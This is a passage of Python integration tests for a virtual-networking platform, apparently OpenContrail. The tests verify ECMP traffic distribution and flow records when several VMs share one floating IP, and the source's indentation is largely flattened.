stream_recv_total_count = 0
stream_recv_count = {}
result = True
for i in range(len(stream_list)):
self.logger.info('%s packets sent in Stream_%s' %
(sender[i].sent, i))
            if sender[i].sent is None:
sender[i].sent = 0
stream_sent_count = stream_sent_count + sender[i].sent
self.logger.info('Total %s packets sent out.' % stream_sent_count)
for stream in stream_list:
stream_recv_count[stream] = 0
for vm in vm_list:
                if receiver[stream][vm].recv is None:
receiver[stream][vm].recv = 0
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
self.logger.info('%s packets received in Stream_%s' %
(stream_recv_count[stream], stream))
stream_recv_total_count = stream_recv_total_count + \
stream_recv_count[stream]
self.logger.info('Total %s packets received.' %
stream_recv_total_count)
if abs(stream_recv_total_count - stream_sent_count) < 5:
self.logger.info('No Packet Loss Seen')
else:
self.logger.info('Packet Loss Seen')
# Checking Flow Records
flow_result = False
flow_result2 = False
flow_result3 = False
rev_flow_result = False
rev_flow_result1 = False
rev_flow_result2 = False
vn1_vrf_id = vm1.get_vrf_id(
self.res.vn1_fq_name, self.res.vn1_vrf_name)
vn2_vrf_id = vm2.get_vrf_id(
self.res.vn2_fq_name, self.res.vn2_vrf_name)
vn3_vrf_id = vm3.get_vrf_id(
self.res.vn3_fq_name, self.res.vn3_vrf_name)
fvn_vrf_id = fvn_vm1.get_vrf_id(
self.res.fvn_fq_name, self.res.fvn_vrf_name)
for vm_node_ip in vm_node_ips:
inspect_h100 = self.agent_inspect[vm_node_ip]
flow_rec1 = None
flow_rec2 = None
flow_rec3 = None
dpi1 = unicode(self.res.dport1)
dpi2 = unicode(self.res.dport2)
dpi3 = unicode(self.res.dport3)
flow_rec1 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=unicode(10000), dport=dpi1, protocol='17')
flow_rec2 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=unicode(11000), dport=dpi1, protocol='17')
flow_rec3 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=unicode(12000), dport=dpi1, protocol='17')
if flow_rec1 is not None:
flow_result = True
self.logger.info(
'Flow from %s:10000 to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.my_fip, dpi1, vm_node_ip))
else:
flow_result = flow_result or False
self.logger.info('No Flow from %s:10000 to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.my_fip, dpi1, vm_node_ip))
if flow_rec2 is not None:
flow_result2 = True
self.logger.info(
'Flow from %s:11000 to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.my_fip, dpi2, vm_node_ip))
else:
flow_result2 = flow_result2 or False
self.logger.info('No Flow from %s:11000 to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.my_fip, dpi2, vm_node_ip))
if flow_rec3 is not None:
flow_result3 = True
self.logger.info(
'Flow from %s:12000 to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.my_fip, dpi3, vm_node_ip))
else:
flow_result3 = flow_result3 or False
self.logger.info('No Flow from %s:12000 to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.my_fip, dpi3, vm_node_ip))
dpi_list = [dpi1]
rev_flow_rec1 = {}
rev_flow_rec2 = {}
rev_flow_rec3 = {}
for dpi in dpi_list:
rev_flow_rec1[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm1.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=unicode(10000), protocol='17')
rev_flow_rec2[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn2_vrf_id, sip=vm2.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=unicode(11000), protocol='17')
rev_flow_rec3[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn3_vrf_id, sip=vm3.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=unicode(12000), protocol='17')
if rev_flow_rec1[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm1.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result1 = True
if rev_flow_rec2[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm2.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result2 = True
if rev_flow_rec3[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm3.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result3 = True
assert flow_result, 'Records for the flow between %s:10000 and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.my_fip, dpi1)
assert flow_result2, 'Records for the flow between %s:11000 and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.my_fip, dpi1)
assert flow_result3, 'Records for the flow between %s:12000 and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.my_fip, dpi1)
assert (
rev_flow_result3 or rev_flow_result1 or rev_flow_result2), 'Records for the reverse flow not seen on any of the agents'
return True
# end test_ecmp_bw_three_vms_same_fip_incr_sport
@preposttest_wrapper
def test_ecmp_bw_three_vms_same_fip_incr_sip(self):
'''Test communication between three VMs that have borrowed the FIP from a common FIP pool. Increment the SIP to set up 3 flows.
'''
result = True
self.fip_pool_name = self.res.fip_pool_name
fvn = self.res.fvn
vn1 = self.res.vn1
vn2 = self.res.vn2
vn3 = self.res.vn3
my_fip = self.res.my_fip
agent_tap_intf_list = {}
tap_intf_list = []
a_list = []
dport1 = self.res.dport1
dport2 = self.res.dport2
dport3 = self.res.dport3
udp_src = self.res.udp_src
vm1 = self.res.vm1
vm2 = self.res.vm2
vm3 = self.res.vm3
fvn_vm1 = self.res.fvn_vm1
fvn_vm2 = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=self.res.fvn.obj, flavor='contrail_flavor_small', image_name='ubuntu-traffic', vm_name='fvn_vm2'))
assert fvn_vm2.verify_on_setup()
fvn_vm3 = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=self.res.fvn.obj, flavor='contrail_flavor_small', image_name='ubuntu-traffic', vm_name='fvn_vm3'))
assert fvn_vm3.verify_on_setup()
fvm_list = [fvn_vm2, fvn_vm3]
for vm in fvm_list:
out = vm.wait_till_vm_is_up()
if not out:
return {'result': out, 'msg': "%s failed to come up" % vm.vm_name}
else:
sleep(5)
self.logger.info('Installing Traffic package on %s ...' %
vm.vm_name)
vm.install_pkg("Traffic")
vm_node_ips = []
vm_node_ips.append(vm1.vm_node_ip)
if (vm1.vm_node_ip != vm2.vm_node_ip):
vm_node_ips.append(vm2.vm_node_ip)
if (vm1.vm_node_ip != vm3.vm_node_ip):
vm_node_ips.append(vm3.vm_node_ip)
self.logger.info("-" * 100)
self.logger.info(
'Starting the following UDP flows : %s-->%s, %s-->%s, %s-->%s' %
(fvn_vm1.vm_ip, my_fip, fvn_vm2.vm_ip, my_fip, fvn_vm3.vm_ip, my_fip))
self.logger.info("-" * 100)
vm_list = []
vm_list = [vm1, vm2, vm3]
fvm_list = [fvn_vm1, fvn_vm2, fvn_vm3]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="udp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream2 = Stream(protocol="ip", proto="udp", src=fvn_vm2.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream3 = Stream(protocol="ip", proto="udp", src=fvn_vm3.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
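# Unlike the incr_sport variant above, these three streams share sport and
# dport and differ only in source IP, one stream per fvn sender VM.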
stream_list = [stream1, stream2, stream3]
tx_vm_node_ip = {}
tx_local_host = {}
send_host = {}
for fvm in fvm_list:
tx_vm_node_ip[fvm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvm.vm_obj)]['host_ip']
tx_local_host[fvm] = Host(
tx_vm_node_ip[fvm],
self.inputs.host_data[fvm.vm_node_ip]['username'],
self.inputs.host_data[fvm.vm_node_ip]['password'])
send_host[fvm] = Host(
fvm.local_ip, fvm.vm_username, fvm.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
recv_filename = 'recvudp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
for i in range(len(stream_list)):
profile[i] = {}
sender[i] = {}
count = count + 1
send_filename = 'sendudp_%s' % count
profile[i] = ContinuousProfile(stream=stream_list[i], chksum=True)
sender[i] = Sender(send_filename, profile[i], tx_local_host[
fvm_list[i]], send_host[fvm_list[i]], self.inputs.logger)
sender[i].start()
self.logger.info('Sending traffic for 10 seconds')
sleep(10)
for i in range(len(stream_list)):
sender[i].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
stream_sent_count = 0
stream_recv_total_count = 0
stream_recv_count = {}
result = True
for i in range(len(stream_list)):
if sender[i].sent is None:
sender[i].sent = 0
self.logger.info('%s packets sent in Stream_%s' %
(sender[i].sent, i))
stream_sent_count = stream_sent_count + sender[i].sent
self.logger.info('Total %s packets sent out.' % stream_sent_count)
for stream in stream_list:
stream_recv_count[stream] = 0
for vm in vm_list:
if receiver[stream][vm].recv is None:
receiver[stream][vm].recv = 0
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
self.logger.info('%s packets received in Stream_%s' %
(stream_recv_count[stream], stream))
stream_recv_total_count = stream_recv_total_count + \
stream_recv_count[stream]
self.logger.info('Total %s packets received.' %
stream_recv_total_count)
if abs(stream_recv_total_count - stream_sent_count) < 5:
self.logger.info('No Packet Loss Seen')
else:
self.logger.info('Packet Loss Seen')
# Checking Flow Records
flow_result = False
flow_result2 = False
flow_result3 = False
rev_flow_result1 = False
rev_flow_result2 = False
rev_flow_result3 = False
vn1_vrf_id = vm1.get_vrf_id(
self.res.vn1_fq_name, self.res.vn1_vrf_name)
vn2_vrf_id = vm2.get_vrf_id(
self.res.vn2_fq_name, self.res.vn2_vrf_name)
vn3_vrf_id = vm3.get_vrf_id(
self.res.vn3_fq_name, self.res.vn3_vrf_name)
fvn_vrf_id_1 = fvn_vm1.get_vrf_id(
self.res.fvn_fq_name, self.res.fvn_vrf_name)
fvn_vrf_id_2 = fvn_vm2.get_vrf_id(
self.res.fvn_fq_name, self.res.fvn_vrf_name)
fvn_vrf_id_3 = fvn_vm3.get_vrf_id(
self.res.fvn_fq_name, self.res.fvn_vrf_name)
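# The three sender VMs share the fvn network, but the VRF id is looked up
# per VM since each may have been scheduled on a different compute node.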
for vm_node_ip in vm_node_ips:
inspect_h100 = self.agent_inspect[vm_node_ip]
flow_rec1 = None
flow_rec2 = None
flow_rec3 = None
dpi1 = unicode(self.res.dport1)
dpi2 = unicode(self.res.dport2)
dpi3 = unicode(self.res.dport3)
flow_rec1 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id_1, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi1, protocol='17')
flow_rec2 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id_2, sip=fvn_vm2.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi1, protocol='17')
flow_rec3 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id_3, sip=fvn_vm3.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi1, protocol='17')
if flow_rec1 is not None:
flow_result = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
else:
flow_result = flow_result or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
if flow_rec2 is not None:
flow_result2 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm2.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
else:
flow_result2 = flow_result2 or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm2.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
if flow_rec3 is not None:
flow_result3 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm3.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
else:
flow_result3 = flow_result3 or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm3.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
dpi_list = [dpi1]
rev_flow_rec1 = {}
rev_flow_rec2 = {}
rev_flow_rec3 = {}
for dpi in dpi_list:
rev_flow_rec1[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm1.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='17')
rev_flow_rec2[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn2_vrf_id, sip=vm2.vm_ip, dip=fvn_vm2.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='17')
rev_flow_rec3[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn3_vrf_id, sip=vm3.vm_ip, dip=fvn_vm3.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='17')
if rev_flow_rec1[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm1.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result1 = True
if rev_flow_rec2[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm2.vm_ip, fvn_vm2.vm_ip, vm_node_ip))
rev_flow_result2 = True
if rev_flow_rec3[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm3.vm_ip, fvn_vm3.vm_ip, vm_node_ip))
rev_flow_result3 = True
assert flow_result, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1)
assert flow_result2, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm2.vm_ip, self.res.udp_src, self.res.my_fip, dpi1)
assert flow_result3, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm3.vm_ip, self.res.udp_src, self.res.my_fip, dpi1)
assert (
rev_flow_result3 or rev_flow_result1 or rev_flow_result2), 'Records for the reverse flow not seen on any of the agents'
return True
# end test_ecmp_bw_three_vms_same_fip_incr_sip
@preposttest_wrapper
def test_ecmp_bw_three_vms_same_fip(self):
'''Test communication between three VMs that have borrowed the FIP from a common FIP pool.
'''
result = True
self.fip_pool_name = self.res.fip_pool_name
fvn = self.res.fvn
vn1 = self.res.vn1
vn2 = self.res.vn2
vn3 = self.res.vn3
my_fip = self.res.my_fip
agent_tap_intf_list = {}
tap_intf_list = []
a_list = []
dport1 = self.res.dport1
dport2 = self.res.dport2
dport3 = self.res.dport3
udp_src = self.res.udp_src
vm1 = self.res.vm1
vm2 = self.res.vm2
vm3 = self.res.vm3
fvn_vm1 = self.res.fvn_vm1
vm_node_ips = []
vm_node_ips.append(vm1.vm_node_ip)
if (vm1.vm_node_ip != vm2.vm_node_ip):
vm_node_ips.append(vm2.vm_node_ip)
if (vm1.vm_node_ip != vm3.vm_node_ip):
vm_node_ips.append(vm3.vm_node_ip)
# Starting three flows of TCP traffic from fvn_vm1 to the FIP
self.logger.info("-" * 80)
self.logger.info('Starting TCP Traffic from fvn_vm1 to %s' % my_fip)
self.logger.info("-" * 80)
vm_list = []
vm_list = [vm1, vm2, vm3]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream2 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport2)
stream3 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport3)
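# These three TCP streams share source IP and sport and differ only in
# destination port (dport1/2/3), again giving three distinct flows to the
# same FIP.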
stream_list = [stream1, stream2, stream3]
tx_vm_node_ip = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvn_vm1.vm_obj)]['host_ip']
tx_local_host = Host(
tx_vm_node_ip,
self.inputs.host_data[tx_vm_node_ip]['username'],
self.inputs.host_data[tx_vm_node_ip]['password'])
send_host = Host(fvn_vm1.local_ip, fvn_vm1.vm_username,
fvn_vm1.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
sender[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
send_filename = 'sendtcp_%s' % count
recv_filename = 'recvtcp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
sender[stream][vm] = Sender(
send_filename, profile[stream][vm], tx_local_host, send_host, self.inputs.logger)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
sender[stream][vm].start()
self.logger.info('Sending traffic for 10 seconds')
sleep(10)
for stream in stream_list:
for vm in vm_list:
sender[stream][vm].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
stream_sent_count = {}
stream_recv_count = {}
result = True
for stream in stream_list:
stream_sent_count[stream] = 0
stream_recv_count[stream] = 0
for vm in vm_list:
if sender[stream][vm].sent is None:
sender[stream][vm].sent = 0
if receiver[stream][vm].recv is None:
receiver[stream][vm].recv = 0
stream_sent_count[stream] = stream_sent_count[stream] + \
sender[stream][vm].sent
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
if abs(stream_recv_count[stream] - stream_sent_count[stream]) < 5:
self.logger.info(
'%s packets sent and %s packets received in Stream' %
(stream_sent_count[stream], stream_recv_count[stream]))
else:
result = False
assert result, '%s packets sent and %s packets received in Stream' % (
stream_sent_count[stream], stream_recv_count[stream])
# Checking Flow Records
flow_result = False
flow_result2 = False
flow_result3 = False
rev_flow_result1 = False
rev_flow_result2 = False
rev_flow_result3 = False
vn1_vrf_id = vm1.get_vrf_id(
self.res.vn1_fq_name, self.res.vn1_vrf_name)
vn2_vrf_id = vm2.get_vrf_id(
self.res.vn2_fq_name, self.res.vn2_vrf_name)
vn3_vrf_id = vm3.get_vrf_id(
self.res.vn3_fq_name, self.res.vn3_vrf_name)
fvn_vrf_id = fvn_vm1.get_vrf_id(
self.res.fvn_fq_name, self.res.fvn_vrf_name)
for vm_node_ip in vm_node_ips:
inspect_h100 = self.agent_inspect[vm_node_ip]
flow_rec1 = None
flow_rec2 = None
flow_rec3 = None
dpi1 = unicode(self.res.dport1)
dpi2 = unicode(self.res.dport2)
dpi3 = unicode(self.res.dport3)
flow_rec1 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi1, protocol='6')
flow_rec2 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi2, protocol='6')
flow_rec3 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi3, protocol='6')
if flow_rec1 is not None:
flow_result = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
else:
flow_result = flow_result or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
if flow_rec2 is not None:
flow_result2 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi2, vm_node_ip))
else:
flow_result2 = flow_result2 or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi2, vm_node_ip))
if flow_rec3 is not None:
flow_result3 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi3, vm_node_ip))
else:
flow_result3 = flow_result3 or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi3, vm_node_ip))
dpi_list = [dpi1, dpi2, dpi3]
rev_flow_rec1 = {}
rev_flow_rec2 = {}
rev_flow_rec3 = {}
for dpi in dpi_list:
rev_flow_rec1[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm1.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='6')
rev_flow_rec2[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn2_vrf_id, sip=vm2.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='6')
rev_flow_rec3[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn3_vrf_id, sip=vm3.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='6')
if rev_flow_rec1[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm1.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result1 = True
if rev_flow_rec2[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm2.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result2 = True
if rev_flow_rec3[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm3.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result3 = True
assert flow_result, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1)
assert flow_result2, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi2)
assert flow_result3, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi3)
assert (
rev_flow_result3 or rev_flow_result1 or rev_flow_result2), 'Records for the reverse flow not seen on any of the agents'
return True
# end test_ecmp_bw_three_vms_same_fip
@preposttest_wrapper
def test_ecmp_bw_two_vms_same_fip(self):
'''Test communication between two VMs that have borrowed the FIP from a common FIP pool.
'''
result = True
fip_pool_name = 'some-pool'
#fvn_name= self.res.fip_vn_name
fvn = self.useFixture(VNFixture(project_name=self.inputs.project_name,
connections=self.connections, vn_name='fvn_1', inputs=self.inputs, subnets=['33.1.1.0/29']))
vn1 = self.useFixture(VNFixture(project_name=self.inputs.project_name,
connections=self.connections, vn_name='vn_1', inputs=self.inputs, subnets=['11.1.1.0/29']))
#vn2= self.useFixture( VNFixture(project_name= self.inputs.project_name, connections= self.connections,vn_name='vn2', inputs= self.inputs, subnets=['20.1.1.0/29']))
my_fip = '33.1.1.3'
agent_tap_intf_list = {}
tap_intf_list = []
a_list = []
dport1 = '9000'
dport2 = '9001'
udp_src = unicode(8000)
vm1 = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=vn1.obj, flavor='contrail_flavor_small', image_name='ubuntu-traffic', vm_name='vn_1_vm_1'))
vm2 = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=vn1.obj, flavor='contrail_flavor_small', image_name='ubuntu-traffic', vm_name='vn_1_vm_2'))
fvn_vm1 = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=fvn.obj, flavor='contrail_flavor_small', image_name='ubuntu-traffic', vm_name='fvn_1_vm1'))
assert fvn.verify_on_setup()
assert vn1.verify_on_setup()
assert vm1.verify_on_setup()
assert vm2.verify_on_setup()
assert fvn_vm1.verify_on_setup()
out1 = vm1.wait_till_vm_is_up()
if not out1:
return {'result': out1, 'msg': "%s failed to come up" % vm1.vm_name}
else:
self.logger.info('Installing Traffic package on %s ...' %
vm1.vm_name)
vm1.install_pkg("Traffic")
out2 = vm2.wait_till_vm_is_up()
if not out2:
return {'result': out2, 'msg': "%s failed to come up" % vm2.vm_name}
else:
sleep(10)
self.logger.info('Installing Traffic package on %s ...' %
vm2.vm_name)
vm2.install_pkg("Traffic")
out3 = fvn_vm1.wait_till_vm_is_up()
if not out3:
return {'result': out3, 'msg': "%s failed to come up" % fvn_vm1.vm_name}
else:
sleep(10)
self.logger.info('Installing Traffic package on %s ...' %
fvn_vm1.vm_name)
fvn_vm1.install_pkg("Traffic")
vn1_fq_name = vn1.vn_fq_name
fvn_fq_name = fvn.vn_fq_name
fvn_vrf_name = fvn.vrf_name
vn1_vrf_name = vn1.vrf_name
fvn_id = fvn.vn_id
vm1_id = vm1.vm_id
vm2_id = vm2.vm_id
fvn_ri_name = fvn.ri_name
vn1_ri_name = vn1.ri_name
(domain, project, fvn) = fvn_fq_name.split(':')
(domain, project, vn1) = vn1_fq_name.split(':')
vmi1_id = vm1.tap_intf[vn1_fq_name]['uuid']
vmi2_id = vm2.tap_intf[vn1_fq_name]['uuid']
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=fvn_id))
assert fip_fixture.verify_on_setup()
my_fip_name = 'fip'
fvn_obj = self.vnc_lib.virtual_network_read(id=fvn_id)
fip_pool_obj = FloatingIpPool(fip_pool_name, fvn_obj)
fip_obj = FloatingIp(my_fip_name, fip_pool_obj, my_fip, True)
# Get the project_fixture
self.project_fixture = self.useFixture(ProjectFixture(
project_name=self.inputs.project_name, connections=self.connections))
# Read the project obj and set to the floating ip object.
fip_obj.set_project(self.project_fixture.project_obj)
vm1_intf = self.vnc_lib.virtual_machine_interface_read(id=vmi1_id)
vm2_intf = self.vnc_lib.virtual_machine_interface_read(id=vmi2_id)
fip_obj.add_virtual_machine_interface(vm1_intf)
fip_obj.add_virtual_machine_interface(vm2_intf)
self.vnc_lib.floating_ip_create(fip_obj)
self.addCleanup(self.vnc_lib.floating_ip_delete, fip_obj.fq_name)
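# Associating the same floating IP with both VMIs is what should give the
# FIP a multipath (ECMP) /32 route, which the rest of the test verifies.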
vm_node_ips = []
vm_node_ips.append(vm1.vm_node_ip)
if (vm1.vm_node_ip != vm2.vm_node_ip):
vm_node_ips.append(vm2.vm_node_ip)
# Get the Route Entry in the control node
for vm_node_ip in vm_node_ips:
active_controller = None
inspect_h1 = self.agent_inspect[vm_node_ip]
agent_xmpp_status = inspect_h1.get_vna_xmpp_connection_status()
for entry in agent_xmpp_status:
if entry['cfg_controller'] == 'Yes':
active_controller = entry['controller_ip']
self.logger.info(
'Active control node from the Agent %s is %s' %
(vm_node_ip, active_controller))
sleep(5)
route_entry = self.cn_inspect[active_controller].get_cn_route_table_entry(
ri_name=fvn_ri_name, prefix=my_fip + '/32')
result = True
self.logger.info('Route_entry in the control node is %s' % route_entry)
if route_entry:
self.logger.info(
'Route Entry found in the Active Control-Node %s' %
(active_controller))
else:
result = False
assert result, 'Route Entry not found in the Active Control-Node %s' % (
active_controller)
# Get the FIP list and verify the vrf_name and address in the VMI
fip_addr_vm1 = vm1.chk_vmi_for_fip(vn1_fq_name)
fip_addr_vm2 = vm2.chk_vmi_for_fip(vn1_fq_name)
fip_vrf_entry_vm1 = vm1.chk_vmi_for_vrf_entry(vn1_fq_name)
fip_vrf_entry_vm2 = vm2.chk_vmi_for_vrf_entry(vn1_fq_name)
self.logger.info(
'The vrf_entry on the VMI of %s is %s and on %s is %s' %
(vm1.vm_name, fip_vrf_entry_vm1, vm2.vm_name, fip_vrf_entry_vm2))
if ((fip_vrf_entry_vm1 == fvn_vrf_name) and (fip_vrf_entry_vm2 == fvn_vrf_name)):
self.logger.info('Correct FIP VRF Entries seen ')
else:
result = False
assert result, 'Incorrect FIP VRF Entries seen'
self.logger.info(
'The FIP address assigned to %s is %s and to %s is %s' %
(vm1.vm_name, fip_addr_vm1, vm2.vm_name, fip_addr_vm2))
